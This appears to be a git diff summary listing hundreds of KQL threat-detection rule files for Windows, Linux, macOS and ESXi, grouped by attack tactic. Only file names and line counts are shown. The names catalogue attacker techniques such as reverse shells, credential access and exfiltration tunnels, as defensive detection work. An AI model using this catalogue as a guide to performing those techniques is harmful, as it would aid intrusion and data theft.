.../use_of_visualuiaverifynative_exe.kql | 12 + .../use_of_vsiisexelauncher_exe.kql | 10 + KQL/rules/Defense Evasion/use_of_wfc_exe.kql | 12 + .../use_short_name_path_in_image.kql | 12 + .../utilityfunctions_ps1_proxy_dll.kql | 10 + .../verclsid_exe_runs_com_object.kql | 10 + ...driver_installation_or_starting_of_vms.kql | 12 + ...sual_basic_command_line_compiler_usage.kql | 12 + ...ab_execution_from_non_default_location.kql | 10 + ...bmig_unusual_parent_or_child_processes.kql | 10 + .../weak_or_abused_passwords_in_cli.kql | 15 ++ .../wfp_filter_added_via_registry.kql | 11 + ...s_binaries_write_suspicious_extensions.kql | 10 + .../windows_defender_context_menu_removed.kql | 15 ++ ...dows_defender_definition_files_removed.kql | 10 + ...ndows_defender_exclusion_list_modified.kql | 13 + ...ows_defender_exclusions_added_registry.kql | 12 + ...ows_defender_service_disabled_registry.kql | 12 + ...hreat_severity_default_action_modified.kql | 16 ++ ...ndows_firewall_disabled_via_powershell.kql | 10 + .../windows_kernel_debugger_execution.kql | 12 + ..._processes_suspicious_parent_directory.kql | 12 + 
.../winget_admin_settings_modification.kql | 12 + ...exe_uncommon_argument_or_child_process.kql | 12 + .../wmic_loading_scripting_libraries.kql | 14 ++ .../write_protect_for_storage_disabled.kql | 12 + ...of_malicious_files_to_the_fonts_folder.kql | 10 + .../Defense Evasion/wsl_kali_linux_usage.kql | 12 + ...mon_locations_via_presentationhost_exe.kql | 13 + .../xsl_script_execution_via_wmic_exe.kql | 16 ++ ...ctory_database_snapshot_via_adexplorer.kql | 10 + ...ing_complete_ad_snapshot_into_dat_file.kql | 12 + .../advanced_ip_scanner_file_event.kql | 12 + ..._monitoring_agent_registry_keys_access.kql | 12 + ...th_service_agents_registry_keys_access.kql | 14 ++ .../Discovery/bloodhound_collection_files.kql | 12 + .../capabilities_discovery_linux.kql | 10 + ...y_and_export_via_get_adcomputer_cmdlet.kql | 12 + ...ter_system_reconnaissance_via_wmic_exe.kql | 10 + .../console_codepage_lookup_via_chcp.kql | 13 + ...esidence_discovery_via_proc_virtual_fs.kql | 13 + KQL/rules/Discovery/crontab_enumeration.kql | 12 + .../detected_windows_software_discovery.kql | 12 + KQL/rules/Discovery/dirlister_execution.kql | 12 + .../Discovery/discovery_of_a_system_time.kql | 12 + ...tainer_discovery_via_dockerenv_listing.kql | 13 + .../domain_trust_discovery_via_dsquery.kql | 12 + .../Discovery/driverquery_exe_execution.kql | 12 + ...merate_all_information_with_whoami_exe.kql | 10 + ...ork_configuration_discovery_via_esxcli.kql | 12 + ...orage_information_discovery_via_esxcli.kql | 12 + ...ystem_information_discovery_via_esxcli.kql | 12 + .../esxi_vm_list_discovery_via_esxcli.kql | 12 + ..._vsan_information_discovery_via_esxcli.kql | 12 + .../file_and_directory_discovery_linux.kql | 13 + .../file_and_directory_discovery_macos.kql | 12 + ..._subfolder_enumeration_via_dir_command.kql | 13 + ...ing_explorer_folder_shortcut_via_shell.kql | 11 + ..._configuration_discovery_via_netsh_exe.kql | 12 + .../Discovery/fsutil_drive_enumeration.kql | 12 + 
...kinfo_vbs_reconnaissance_script_output.kql | 10 + ...esult_display_group_policy_information.kql | 10 + ...mbership_reconnaissance_via_whoami_exe.kql | 10 + ...cktool_bloodhound_sharphound_execution.kql | 12 + .../Discovery/hacktool_certify_execution.kql | 10 + .../Discovery/hacktool_certipy_execution.kql | 13 + .../hacktool_sharpldapmonitor_execution.kql | 10 + .../hacktool_sharpldapwhoami_execution.kql | 12 + .../hacktool_sharpview_execution.kql | 10 + .../hacktool_soaphound_execution.kql | 11 + .../hacktool_trufflesnout_execution.kql | 10 + ...ting_of_wifi_credentials_via_netsh_exe.kql | 10 + ...twork_service_scanning_tools_execution.kql | 12 + .../linux_remote_system_discovery.kql | 12 + .../Discovery/local_accounts_discovery.kql | 12 + .../local_groups_discovery_linux.kql | 12 + .../local_groups_discovery_macos.kql | 12 + ...cal_groups_reconnaissance_via_wmic_exe.kql | 14 ++ .../local_system_accounts_discovery_linux.kql | 12 + .../local_system_accounts_discovery_macos.kql | 12 + .../macos_network_service_scanning.kql | 12 + .../macos_remote_system_discovery.kql | 12 + .../network_reconnaissance_activity.kql | 12 + .../Discovery/network_sniffing_macos.kql | 14 ++ ...rk_trace_capture_started_via_netsh_exe.kql | 12 + KQL/rules/Discovery/nltest_exe_execution.kql | 12 + .../notepad_password_files_discovery.kql | 12 + .../obfuscated_ip_download_activity.kql | 10 + KQL/rules/Discovery/obfuscated_ip_via_cli.kql | 10 + .../os_architecture_discovery_via_grep.kql | 11 + .../permission_check_via_accesschk_exe.kql | 12 + KQL/rules/Discovery/pktmon_exe_execution.kql | 12 + ...scan_binary_data_transmission_activity.kql | 12 + ...and_service_reconnaissance_via_reg_exe.kql | 12 + ...container_discovery_via_inodes_listing.kql | 13 + ...al_discovery_activity_using_find_linux.kql | 10 + ...al_discovery_activity_using_find_macos.kql | 10 + ...tial_discovery_activity_via_dnscmd_exe.kql | 12 + ...tential_gobrat_file_discovery_via_grep.kql | 10 + 
...l_recon_activity_using_driverquery_exe.kql | 12 + ...otential_recon_activity_via_nltest_exe.kql | 12 + ...nce_activity_via_gathernetworkinfo_vbs.kql | 12 + .../pua_adfind_suspicious_execution.kql | 12 + .../Discovery/pua_adidnsdump_execution.kql | 12 + .../pua_advanced_ip_scanner_execution.kql | 12 + .../pua_advanced_port_scanner_execution.kql | 13 + KQL/rules/Discovery/pua_crassus_execution.kql | 12 + .../Discovery/pua_nmap_zenmap_execution.kql | 12 + .../Discovery/pua_seatbelt_execution.kql | 12 + .../pua_softperfect_netscan_execution.kql | 14 ++ ...vedirectory_enumeration_via_adfind_exe.kql | 12 + .../Discovery/pua_trufflehog_execution.kql | 15 ++ .../pua_trufflehog_execution_linux.kql | 15 ++ .../Discovery/python_initiated_connection.kql | 12 + ...on_command_output_piped_to_findstr_exe.kql | 12 + .../Discovery/renamed_whoami_execution.kql | 10 + .../sam_registry_hive_handle_request.kql | 10 + .../security_software_discovery_linux.kql | 12 + .../security_software_discovery_macos.kql | 12 + ...y_tools_keyword_lookup_via_findstr_exe.kql | 12 + ..._and_session_enumeration_using_net_exe.kql | 12 + .../Discovery/shell_execution_gcc_linux.kql | 11 + .../shell_execution_via_find_linux.kql | 11 + .../shell_execution_via_flock_linux.kql | 11 + .../shell_execution_via_nice_linux.kql | 11 + .../shell_invocation_via_apt_linux.kql | 12 + ...ctory_database_snapshot_via_adexplorer.kql | 10 + .../suspicious_execution_of_hostname.kql | 10 + .../suspicious_execution_of_systeminfo.kql | 10 + ..._reconnaissance_activity_using_net_exe.kql | 15 ++ .../suspicious_kernel_dump_using_dtrace.kql | 10 + .../Discovery/suspicious_network_command.kql | 12 + ...k_connection_to_ip_lookup_service_apis.kql | 12 + .../suspicious_query_of_machineguid.kql | 10 + ...vity_using_get_localgroupmember_cmdlet.kql | 12 + ...nce_activity_via_gathernetworkinfo_vbs.kql | 10 + .../Discovery/suspicious_use_of_psloglist.kql | 13 + .../Discovery/suspicious_where_execution.kql | 13 + 
.../Discovery/syskey_registry_keys_access.kql | 10 + ...ault_driver_altitude_using_findstr_exe.kql | 10 + .../system_information_discovery.kql | 12 + ...stem_information_discovery_using_ioreg.kql | 15 ++ ...em_information_discovery_using_sw_vers.kql | 12 + ...mation_discovery_using_system_profiler.kql | 14 ++ ...rmation_discovery_via_registry_queries.kql | 12 + ...stem_integrity_protection_sip_disabled.kql | 11 + ...m_integrity_protection_sip_enumeration.kql | 13 + ...em_network_connections_discovery_linux.kql | 12 + ...em_network_connections_discovery_macos.kql | 12 + ...work_connections_discovery_via_net_exe.kql | 10 + .../system_network_discovery_linux.kql | 12 + .../system_network_discovery_macos.kql | 12 + ...ction_to_active_directory_web_services.kql | 13 + ...tem_information_discovery_via_wmic_exe.kql | 14 ++ KQL/rules/Discovery/use_of_w32tm_as_timer.kql | 12 + ...overy_and_export_via_get_aduser_cmdlet.kql | 12 + .../Discovery/vim_gtfobin_abuse_linux.kql | 12 + KQL/rules/Discovery/whoami_as_parameter.kql | 10 + .../whoami_exe_execution_anomaly.kql | 14 ++ ...hoami_exe_execution_with_output_option.kql | 10 + ...ell_cmdlets_execution_proccesscreation.kql | 12 + ...l_sideloading_from_suspicious_location.kql | 10 + ...ndows_capability_via_powershell_cmdlet.kql | 12 + .../adwind_rat_jrat_file_artifact.kql | 10 + .../application_removed_via_wmic_exe.kql | 10 + .../application_terminated_via_wmic_exe.kql | 10 + ...ary_binary_execution_using_gup_utility.kql | 12 + ...arbitrary_msi_download_via_devinit_exe.kql | 10 + ...ommand_execution_via_settingcontent_ms.kql | 10 + ...sembly_dll_creation_via_aspnetcompiler.kql | 13 + .../base64_mz_header_in_commandline.kql | 12 + .../Execution/bash_interactive_shell.kql | 10 + ...y_proxy_execution_via_dotnet_trace_exe.kql | 12 + .../bpftrace_unsafe_option_usage.kql | 12 + ..._exe_from_potentially_suspicious_paths.kql | 11 + .../capsh_shell_invocation_linux.kql | 11 + ...wershell_policies_to_an_insecure_level.kql | 12 + 
...eadless_execution_to_mockbin_like_site.kql | 10 + ...ted_in_a_potential_suspicious_location.kql | 10 + ...clr_dll_loaded_via_office_applications.kql | 10 + ...ing_space_characters_execution_anomaly.kql | 12 + ...cmstp_uac_bypass_via_com_object_access.kql | 12 + ...ith_suspicious_url_and_appdata_strings.kql | 12 + ...omputer_password_change_via_ksetup_exe.kql | 10 + ...conhost_exe_commandline_path_traversal.kql | 12 + ...ost_spawned_by_uncommon_parent_process.kql | 10 + ...ion_form_potentially_suspicious_parent.kql | 10 + ...t_potentially_suspicious_child_process.kql | 14 ++ ...pt_uncommon_script_extension_execution.kql | 10 + .../csexec_service_file_creation.kql | 10 + ...quest_with_potential_custom_user_agent.kql | 10 + ...ta_export_from_mssql_table_via_bcp_exe.kql | 14 ++ ..._of_powershell_execution_via_sqlps_exe.kql | 14 ++ ...mbly_dll_loaded_via_office_application.kql | 10 + ...nternals_suspicious_powershell_cmdlets.kql | 14 ++ .../Execution/enable_bpf_kprobes_tracing.kql | 10 + ...enable_microsoft_dynamic_data_exchange.kql | 10 + .../Execution/esxi_vm_kill_via_esxcli.kql | 12 + .../exchange_powershell_snap_ins_usage.kql | 10 + .../execute_code_with_pester_bat.kql | 12 + ...execute_code_with_pester_bat_as_parent.kql | 12 + ..._of_powershell_script_in_public_folder.kql | 12 + ...ed_in_potentially_suspicious_directory.kql | 10 + .../file_decryption_using_gpg4win.kql | 10 + ...file_download_from_ip_url_via_curl_exe.kql | 10 + ..._via_gpg4win_from_suspicious_locations.kql | 10 + .../file_encryption_using_gpg4win.kql | 10 + ...nsion_created_by_an_office_application.kql | 10 + ...edpaths_from_browser_file_upload_abuse.kql | 10 + ...process_from_browser_file_upload_abuse.kql | 15 ++ .../Execution/forfiles_command_execution.kql | 15 ++ .../fsutil_behavior_set_symlinkevaluation.kql | 14 ++ ...gac_dll_loaded_via_office_applications.kql | 12 + .../hacktool_covenant_powershell_launcher.kql | 10 + .../hacktool_crackmapexec_execution.kql | 10 + 
...ol_crackmapexec_powershell_obfuscation.kql | 10 + ...rsploit_empire_scheduled_task_creation.kql | 12 + ...ol_empire_powershell_launch_parameters.kql | 12 + ...ol_jlaive_in_memory_assembly_execution.kql | 10 + .../Execution/hacktool_koadic_execution.kql | 10 + .../Execution/hacktool_pchunter_execution.kql | 12 + ...ial_impacket_lateral_movement_activity.kql | 10 + ...l_redmimicry_winnti_playbook_execution.kql | 10 + ...hacktool_sharpwsus_wsuspendu_execution.kql | 12 + ...ool_sliver_c2_implant_activity_pattern.kql | 12 + .../hacktool_stracciatella_execution.kql | 12 + ...ware_model_reconnaissance_via_wmic_exe.kql | 10 + ...hidden_powershell_in_link_file_pattern.kql | 12 + ...mputer_zone_for_http_protocols_via_cli.kql | 11 + ...om_suspicious_directories_proccreation.kql | 10 + ...tion_spawn_shell_via_os_system_library.kql | 11 + ...secure_proxy_doh_transfer_via_curl_exe.kql | 12 + .../insecure_transfer_via_curl_exe.kql | 12 + .../installation_of_wsl_kali_linux.kql | 14 ++ .../interactive_bash_suspicious_children.kql | 12 + KQL/rules/Execution/jamf_mdm_execution.kql | 13 + ...mdm_potential_suspicious_child_process.kql | 12 + .../java_running_with_remote_debugging.kql | 10 + .../jxa_in_memory_execution_via_osascript.kql | 10 + ...security_stopped_via_commandline_linux.kql | 14 ++ .../Execution/linux_hacktool_execution.kql | 12 + .../linux_reverse_shell_indicator.kql | 10 + .../local_file_read_using_curl_exe.kql | 10 + ...on_user_password_change_via_ksetup_exe.kql | 10 + ...acos_scripting_interpreter_applescript.kql | 12 + ...d_powershell_keywords_in_command_lines.kql | 10 + ...powershell_commandlets_processcreation.kql | 10 + ...icious_powershell_scripts_filecreation.kql | 10 + ...l_add_in_loaded_from_uncommon_location.kql | 12 + ...a_for_outlook_addin_loaded_via_outlook.kql | 12 + .../Execution/mmc20_lateral_movement.kql | 12 + ...h_reversed_extensions_using_rtlo_abuse.kql | 13 + .../mmc_loading_script_engines_dlls.kql | 14 ++ .../named_pipe_created_via_mkfifo.kql | 
10 + .../net_webclient_casing_anomalies.kql | 10 + ...k_connection_initiated_by_eqnedt32_exe.kql | 12 + ...k_connection_initiated_by_regsvr32_exe.kql | 10 + .../new_application_in_appcompat.kql | 14 ++ .../new_process_created_via_wmic_exe.kql | 10 + ...l_smart_card_created_via_tpmvscmgr_exe.kql | 12 + .../nodejs_execution_of_javascript_file.kql | 16 ++ KQL/rules/Execution/nohup_execution.kql | 12 + ...interactive_powershell_process_spawned.kql | 12 + ...ted_network_connection_to_non_local_ip.kql | 17 ++ ...erator_bloopers_cobalt_strike_commands.kql | 10 + ...perator_bloopers_cobalt_strike_modules.kql | 10 + ...otentially_suspicious_applet_osascript.kql | 10 + .../osacompile_run_only_execution.kql | 10 + ...nnection_initiated_by_microsoft_dialer.kql | 15 ++ ...eunsafeclientmailrules_setting_enabled.kql | 10 + ...d_and_decrypted_via_built_in_utilities.kql | 10 + .../Execution/pcre_net_package_image_load.kql | 10 + .../Execution/pcre_net_package_temp_files.kql | 10 + ...oy_remote_adminstartion_tool_execution.kql | 12 + .../perl_inline_command_execution.kql | 10 + .../php_inline_command_execution.kql | 10 + ...rbitrary_command_execution_via_ftp_exe.kql | 10 + ...arbitrary_file_download_via_cmdl32_exe.kql | 13 + ...inary_impersonating_sysinternals_tools.kql | 13 + ...ial_binary_proxy_execution_via_cdb_exe.kql | 12 + ...al_clickfix_execution_pattern_registry.kql | 16 ++ ...otential_cobaltstrike_process_patterns.kql | 10 + ...commandline_path_traversal_via_cmd_exe.kql | 12 + .../potential_cookies_session_hijacking.kql | 10 + ...tration_activity_via_commandline_tools.kql | 12 + ...tial_dll_injection_via_acccheckconsole.kql | 15 ++ .../potential_dosfuscation_activity.kql | 10 + ...r_script_execution_via_wscript_cscript.kql | 12 + ..._spoofing_using_right_to_left_override.kql | 13 + ...tential_netcat_reverse_shell_execution.kql | 12 + ...potential_perl_reverse_shell_execution.kql | 12 + ...etoolboxcmd_exe_vm_state_change_script.kql | 10 + 
.../Execution/potential_php_reverse_shell.kql | 12 + ...al_powershell_command_line_obfuscation.kql | 13 + ..._powershell_obfuscation_via_wchar_char.kql | 10 + ...ial_powershell_reverseshell_connection.kql | 12 + ...duct_class_reconnaissance_via_wmic_exe.kql | 15 ++ ...al_product_reconnaissance_via_wmic_exe.kql | 10 + ...tential_rdp_session_hijacking_activity.kql | 12 + ...ger_content_execution_via_werfault_exe.kql | 10 + .../potential_renamed_rundll32_execution.kql | 12 + .../potential_ruby_reverse_shell.kql | 10 + ..._shelldispatch_dll_functionality_abuse.kql | 12 + ...er_launch_from_document_reader_process.kql | 13 + ...rvice_path_reconnaissance_via_wmic_exe.kql | 10 + ...potential_winapi_calls_via_commandline.kql | 12 + ...l_movement_wmiprvse_spawned_powershell.kql | 14 ++ .../potential_xterm_reverse_shell.kql | 10 + ...child_process_of_clickonce_application.kql | 10 + ...lly_suspicious_child_process_of_vscode.kql | 12 + ...suspicious_child_process_of_winrar_exe.kql | 10 + ...d_executed_via_run_dialog_box_registry.kql | 12 + ...cious_electron_application_commandline.kql | 12 + ...uspicious_execution_of_pdqdeployrunner.kql | 12 + ...file_sharing_domain_via_powershell_exe.kql | 10 + ...javascript_execution_via_nodejs_binary.kql | 12 + ...spicious_named_pipe_created_via_mkfifo.kql | 10 + ...tially_suspicious_webdav_lnk_execution.kql | 10 + .../powershell_as_a_service_in_registry.kql | 10 + .../powershell_base64_encoded_iex_cmdlet.kql | 10 + ...wershell_base64_encoded_invoke_keyword.kql | 10 + ...ase64_encoded_reflective_assembly_load.kql | 12 + .../powershell_base64_encoded_wmi_classes.kql | 10 + ...e_dll_loaded_by_non_powershell_process.kql | 15 ++ ...ershell_download_and_execution_cradles.kql | 12 + .../Execution/powershell_download_pattern.kql | 10 + ...with_potential_decryption_capabilities.kql | 12 + ...owershell_inline_execution_from_a_file.kql | 10 + ...dowsinstaller_com_from_remote_location.kql | 14 ++ ...rshell_script_execution_policy_enabled.kql | 12 + 
.../powershell_script_run_in_appdata.kql | 12 + .../process_reconnaissance_via_wmic_exe.kql | 10 + KQL/rules/Execution/psexec_execution.kql | 12 + ...hild_process_execution_as_local_system.kql | 12 + .../Execution/psexec_service_execution.kql | 12 + .../psexec_service_file_creation.kql | 10 + .../Execution/pua_advancedrun_execution.kql | 10 + KQL/rules/Execution/pua_nircmd_execution.kql | 12 + .../pua_nircmd_execution_as_local_system.kql | 12 + KQL/rules/Execution/pua_nsudo_execution.kql | 12 + .../pua_radmin_viewer_utility_execution.kql | 10 + KQL/rules/Execution/pua_runxcmd_execution.kql | 12 + .../pua_wsudo_suspicious_execution.kql | 10 + .../python_inline_command_execution.kql | 12 + ...l_execution_via_pty_and_socket_modules.kql | 11 + .../python_spawning_pretty_tty_on_windows.kql | 10 + ...hon_spawning_pretty_tty_via_pty_module.kql | 11 + .../Execution/query_usage_to_exfil_data.kql | 10 + .../read_contents_from_stdin_via_cmd_exe.kql | 10 + ...formance_counter_values_via_lodctr_exe.kql | 12 + .../remcom_service_file_creation.kql | 10 + ...with_known_revoked_signing_certificate.kql | 16 ++ ...screenconnect_remote_command_execution.kql | 12 + ...cess_tool_screenconnect_temporary_file.kql | 14 ++ .../remote_dll_load_via_rundll32_exe.kql | 10 + ...powershell_session_host_process_winrm_.kql | 12 + .../Execution/renamed_curl_exe_execution.kql | 10 + .../Execution/renamed_ftp_exe_execution.kql | 10 + .../renamed_jusched_exe_execution.kql | 10 + .../renamed_nircmd_exe_execution.kql | 10 + .../renamed_pingcastle_binary_execution.kql | 10 + .../renamed_psexec_service_execution.kql | 12 + .../ruby_inline_command_execution.kql | 10 + .../scheduled_cron_task_job_linux.kql | 12 + .../scheduled_cron_task_job_macos.kql | 12 + ...heduled_task_creation_via_schtasks_exe.kql | 13 + ...script_event_consumer_spawning_process.kql | 10 + ...reter_execution_from_suspicious_folder.kql | 10 + .../service_reconnaissance_via_wmic_exe.kql | 14 ++ .../service_started_stopped_via_wmic_exe.kql 
| 10 + ...type_change_via_powershell_set_service.kql | 12 + .../service_startuptype_change_via_sc_exe.kql | 12 + ...on_of_process_located_in_tmp_directory.kql | 10 + .../shell_execution_via_git_linux.kql | 11 + .../shell_execution_via_rsync_linux.kql | 13 + ...shell_invocation_via_env_command_linux.kql | 13 + .../shell_invocation_via_ssh_linux.kql | 11 + .../silenttrinity_stager_msbuild_activity.kql | 10 + ...ent_tools_powershell_session_detection.kql | 14 ++ .../start_windows_service_via_net_exe.kql | 12 + .../successful_account_login_via_wmi.kql | 13 + ..._binaries_and_scripts_in_public_folder.kql | 12 + ...ectory_spawned_from_office_application.kql | 10 + ...suspicious_child_process_of_bginfo_exe.kql | 10 + ...s_deno_file_written_from_remote_source.kql | 14 ++ ...load_and_execute_pattern_via_curl_wget.kql | 17 ++ ...s_electron_application_child_processes.kql | 11 + ...reflection_assembly_load_function_call.kql | 12 + ...icious_encoded_powershell_command_line.kql | 10 + ...cious_execution_location_of_wermgr_exe.kql | 10 + ...us_execution_of_powershell_with_base64.kql | 10 + ...th_whitespace_padding_clickfix_filefix.kql | 13 + ..._characteristics_due_to_missing_fields.kql | 10 + .../suspicious_file_created_in_perflogs.kql | 12 + ..._from_file_sharing_domain_via_curl_exe.kql | 10 + ..._from_file_sharing_domain_via_wget_exe.kql | 10 + ...ous_file_download_from_ip_via_curl_exe.kql | 10 + ...ous_file_download_from_ip_via_wget_exe.kql | 10 + ...le_download_from_ip_via_wget_exe_paths.kql | 10 + ...tion_from_internet_hosted_webdav_share.kql | 10 + ...cious_greedy_compression_using_rar_exe.kql | 10 + ...icious_installer_package_child_process.kql | 12 + ...cious_interactive_powershell_as_system.kql | 13 + ...ious_invocation_of_shell_via_awk_linux.kql | 12 + ...spicious_invocation_of_shell_via_rsync.kql | 11 + .../suspicious_java_children_processes.kql | 10 + ...s_microsoft_office_child_process_macos.kql | 10 + ...uspicious_mshta_exe_execution_patterns.kql | 10 + 
.../Execution/suspicious_nohup_execution.kql | 10 + .../suspicious_outlook_child_process.kql | 10 + ...etoolboxcmd_exe_vm_state_change_script.kql | 10 + ...owershell_download_and_execute_pattern.kql | 12 + ...us_powershell_encoded_command_patterns.kql | 12 + ...ious_powershell_iex_execution_patterns.kql | 12 + ...picious_powershell_parameter_substring.kql | 10 + .../suspicious_powershell_parent_process.kql | 12 + ...uspicious_process_created_via_wmic_exe.kql | 10 + .../Execution/suspicious_program_names.kql | 12 + ...ious_remote_child_process_from_outlook.kql | 10 + .../suspicious_runscripthelper_exe.kql | 10 + .../suspicious_scan_loop_network.kql | 12 + ...ious_script_execution_from_temp_folder.kql | 12 + ...cters_in_runmru_registry_path_clickfix.kql | 13 + ...rs_in_typedpaths_registry_path_filefix.kql | 13 + ...suspicious_spool_service_child_process.kql | 10 + ...ious_use_of_csharp_interactive_console.kql | 12 + ...icious_windowsterminal_child_processes.kql | 12 + ...ious_wmic_execution_via_office_process.kql | 10 + .../suspicious_wmiprvse_child_process.kql | 10 + .../suspicious_wsman_provider_image_loads.kql | 10 + .../suspicious_zipexec_execution.kql | 10 + .../Execution/sysprep_on_appdata_folder.kql | 12 + ...and_volume_reconnaissance_via_wmic_exe.kql | 13 + .../uac_bypass_using_idiagnostic_profile.kql | 10 + ..._bypass_using_idiagnostic_profile_file.kql | 10 + .../uncommon_child_process_of_bginfo_exe.kql | 10 + ...uncommon_child_processes_of_sndvol_exe.kql | 10 + ..._one_time_only_scheduled_task_at_00_00.kql | 12 + .../unusual_parent_process_for_cmd_exe.kql | 10 + ...ge_of_web_request_commands_and_cmdlets.kql | 12 + .../Execution/use_of_fsharp_interpreters.kql | 14 ++ KQL/rules/Execution/use_of_openconsole.kql | 12 + .../Execution/use_of_pcalua_for_execution.kql | 12 + .../vba_dll_loaded_via_office_application.kql | 12 + ...pressanykey_arbitrary_binary_execution.kql | 12 + ...ejstools_pressanykey_renamed_execution.kql | 10 + 
.../vmtoolsd_suspicious_child_process.kql | 12 + ...ix_updates_reconnaissance_via_wmic_exe.kql | 10 + ...cation_file_write_to_suspicious_folder.kql | 10 + ...le_file_creation_by_non_system_process.kql | 10 + .../wmic_remote_command_execution.kql | 10 + .../Execution/wmiprvse_spawned_a_process.kql | 12 + .../wmiprvse_wbemcomn_dll_hijack.kql | 10 + .../wmiprvse_wbemcomn_dll_hijack_file.kql | 10 + .../wscript_or_cscript_dropper_file.kql | 10 + .../wscript_shell_run_in_commandline.kql | 12 + .../Execution/wsl_child_process_anomaly.kql | 10 + ...process_located_in_suspicious_location.kql | 12 + ...rectory_structure_export_via_csvde_exe.kql | 10 + ...ectory_structure_export_via_ldifde_exe.kql | 10 + ..._download_via_configsecuritypolicy_exe.kql | 13 + ...n_to_ngrok_tunneling_service_initiated.kql | 15 ++ ...ation_to_ngrok_tunneling_service_linux.kql | 12 + .../disk_image_creation_via_hdiutil_macos.kql | 12 + ...ltration_and_tunneling_tools_execution.kql | 12 + .../email_exifiltration_via_powershell.kql | 10 + ...ports_critical_registry_keys_to_a_file.kql | 12 + .../exports_registry_key_to_a_file.kql | 12 + ...s_data_exfiltration_by_datasvcutil_exe.kql | 14 ++ ...nnection_initiated_to_btunnels_domains.kql | 14 ++ ...itiated_to_cloudflared_tunnels_domains.kql | 14 ++ ...nection_initiated_to_devtunnels_domain.kql | 13 + ...etwork_connection_initiated_to_mega_nz.kql | 14 ++ ...d_to_visual_studio_code_tunnels_domain.kql | 13 + ...ted_network_connection_to_ngrok_domain.kql | 15 ++ .../Exfiltration/pua_rclone_execution.kql | 10 + .../pua_restic_backup_tool_execution.kql | 15 ++ .../python_webserver_execution_linux.kql | 15 ++ .../rclone_config_file_creation.kql | 12 + .../Exfiltration/split_a_file_into_pieces.kql | 12 + .../suspicious_curl_file_upload_linux.kql | 12 + .../suspicious_outbound_smtp_connections.kql | 14 ++ ...ous_powershell_mailbox_export_to_share.kql | 10 + ...cious_redirection_to_local_admin_share.kql | 10 + ...bdav_client_execution_via_rundll32_exe.kql | 11 + 
.../Exfiltration/tap_installer_execution.kql | 12 + ...bdav_client_execution_via_rundll32_exe.kql | 12 + .../all_backups_deleted_via_wbadmin_exe.kql | 13 + KQL/rules/Impact/backup_files_deleted.kql | 12 + ...onfiguration_tampering_via_bcdedit_exe.kql | 12 + ...copy_from_volumeshadowcopy_via_cmd_exe.kql | 12 + KQL/rules/Impact/dd_file_overwrite.kql | 12 + .../Impact/delete_all_scheduled_tasks.kql | 12 + .../delete_important_scheduled_task.kql | 12 + ...eleted_data_overwritten_via_cipher_exe.kql | 13 + ..._shadow_copies_via_wmi_with_powershell.kql | 10 + .../disable_important_scheduled_task.kql | 10 + ...e_recovery_from_backup_via_wbadmin_exe.kql | 12 + .../group_has_been_deleted_via_groupdel.kql | 12 + KQL/rules/Impact/history_file_deletion.kql | 12 + .../Impact/linux_crypto_mining_indicators.kql | 12 + .../linux_crypto_mining_pool_connections.kql | 12 + ...f_rstrtmgr_dll_by_a_suspicious_process.kql | 15 ++ ...of_rstrtmgr_dll_by_an_uncommon_process.kql | 16 ++ ..._communication_with_crypto_mining_pool.kql | 12 + ...added_to_time_machine_via_tmutil_macos.kql | 14 ++ ...or_ca_or_authroot_certificate_to_store.kql | 10 + .../Impact/portable_gpg_exe_execution.kql | 10 + .../potential_crypto_mining_activity.kql | 13 + ...ile_overwrite_via_sysinternals_sdelete.kql | 10 + ...are_activity_using_legalnotice_message.kql | 10 + ...potential_secure_deletion_with_sdelete.kql | 13 + ...ous_change_to_sensitive_critical_files.kql | 12 + .../registry_disable_system_restore.kql | 10 + .../Impact/renamed_gpg_exe_execution.kql | 10 + ...renamed_sysinternals_sdelete_execution.kql | 12 + ...e_access_via_volume_shadow_copy_backup.kql | 13 + .../stop_windows_service_via_net_exe.kql | 12 + ...ws_service_via_powershell_stop_service.kql | 12 + .../stop_windows_service_via_sc_exe.kql | 12 + ...ious_creation_txt_file_in_user_desktop.kql | 10 + .../suspicious_execution_of_shutdown.kql | 10 + ...cious_execution_of_shutdown_to_log_out.kql | 10 + .../suspicious_macos_firmware_activity.kql | 12 + 
.../Impact/suspicious_reg_add_bitlocker.kql | 12 + .../Impact/system_shutdown_reboot_macos.kql | 12 + ...ckup_deletion_attempt_via_tmutil_macos.kql | 14 ++ ...chine_backup_disabled_via_tmutil_macos.kql | 14 ++ .../user_has_been_deleted_via_userdel.kql | 12 + ...windows_backup_deleted_via_wbadmin_exe.kql | 15 ++ ...very_environment_disabled_via_reagentc.kql | 15 ++ .../disk_image_mounting_via_hdiutil_macos.kql | 12 + .../iso_file_created_within_temp_folders.kql | 12 + ..._image_mount_indicator_in_recent_files.kql | 14 ++ .../octopus_scanner_malware.kql | 10 + .../office_macro_file_creation.kql | 12 + ..._file_creation_from_suspicious_process.kql | 10 + .../office_macro_file_download.kql | 15 ++ .../phishing_pattern_iso_in_archive.kql | 12 + ...reenconnect_server_web_shell_execution.kql | 12 + ...sions_via_the_registry_2_vpn_extension.kql | 10 + .../shell_process_spawned_by_java_exe.kql | 13 + ...suspicious_browser_child_process_macos.kql | 12 + ...suspicious_child_process_of_sql_server.kql | 10 + ...icious_child_process_of_veeam_dabatase.kql | 10 + ...icious_double_extension_file_execution.kql | 10 + ...xecution_from_outlook_temporary_folder.kql | 10 + ...ious_execution_via_macos_script_editor.kql | 10 + ...created_in_outlook_temporary_directory.kql | 14 ++ ..._write_to_sharepoint_layouts_directory.kql | 12 + .../suspicious_hwp_sub_processes.kql | 10 + ...ine_padding_with_whitespace_characters.kql | 14 ++ ...icious_microsoft_onenote_child_process.kql | 12 + ...sexchangemailboxreplication_aspx_write.kql | 10 + ...spicious_processes_spawned_by_java_exe.kql | 13 + .../suspicious_processes_spawned_by_winrm.kql | 12 + ...s_shells_spawn_by_java_utility_keytool.kql | 10 + .../terminal_service_process_spawn.kql | 10 + ...er_added_to_remote_desktop_users_group.kql | 12 + ...ows_registry_trust_record_modification.kql | 12 + ...rom_or_to_admin_share_or_sysvol_folder.kql | 12 + .../hacktool_sharpmove_tool_execution.kql | 11 + .../hacktool_winrm_access_via_evil_winrm.kql | 10 + 
